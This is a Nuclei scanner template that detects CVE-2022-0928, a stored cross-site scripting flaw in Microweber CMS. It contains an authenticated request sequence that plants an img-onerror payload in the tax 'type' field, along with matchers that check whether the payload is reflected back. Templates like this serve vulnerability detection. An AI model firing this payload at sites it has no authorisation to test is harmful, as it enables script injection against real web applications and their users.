nuclei-templates/http/cves/2022/CVE-2022-0928.yaml

61 lines
2.1 KiB
YAML
Raw Normal View History

2022-08-14 12:03:29 +00:00
id: CVE-2022-0928
info:
name: Microweber < 1.2.12 - Stored Cross-Site Scripting
2022-08-14 12:03:29 +00:00
author: amit-jd
severity: medium
2022-08-14 12:03:29 +00:00
description: |
Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability via the Type parameter in the body of POST request, which is triggered by Add/Edit Tax.
2022-08-14 12:03:29 +00:00
reference:
- https://huntr.dev/bounties/085aafdd-ba50-44c7-9650-fa573da29bcd
- https://github.com/microweber/microweber/commit/fc9137c031f7edec5f50d73b300919fb519c924a
- https://nvd.nist.gov/vuln/detail/CVE-2022-0928
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-0928
cwe-id: CWE-79
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
epss-score: 0.00135
2022-08-16 15:42:47 +00:00
metadata:
max-request: 3
verified: true
2022-10-24 13:03:38 +00:00
tags: cve,cve2022,authenticated,huntr,xss,microweber,cms
2022-08-14 12:03:29 +00:00
http:
2022-08-14 12:03:29 +00:00
- raw:
- |
POST /api/user_login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
- |
POST /api/shop/save_tax_item HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
2022-08-16 15:42:47 +00:00
Referer: {{BaseURL}}/admin/view:settings
2022-08-14 12:03:29 +00:00
id=0&name=vat1&type="><img+src%3dx+onerror%3dalert(document.domain)>&rate=10
- |
2022-08-16 15:42:47 +00:00
POST /module HTTP/1.1
2022-08-14 12:03:29 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
2022-08-16 15:42:47 +00:00
Referer:{{BaseURL}}/admin/view:settings
2022-08-14 12:03:29 +00:00
class=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes
req-condition: true
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'contains(body_3,"<img src=x onerror=alert(document.domain)></td>")'
2022-08-14 12:03:29 +00:00
- 'contains(all_headers_3,"text/html")'
- 'status_code_2 == 200 && status_code_3 == 200'
2022-08-14 12:39:27 +00:00
condition: and
# Enhanced by mp on 2022/09/14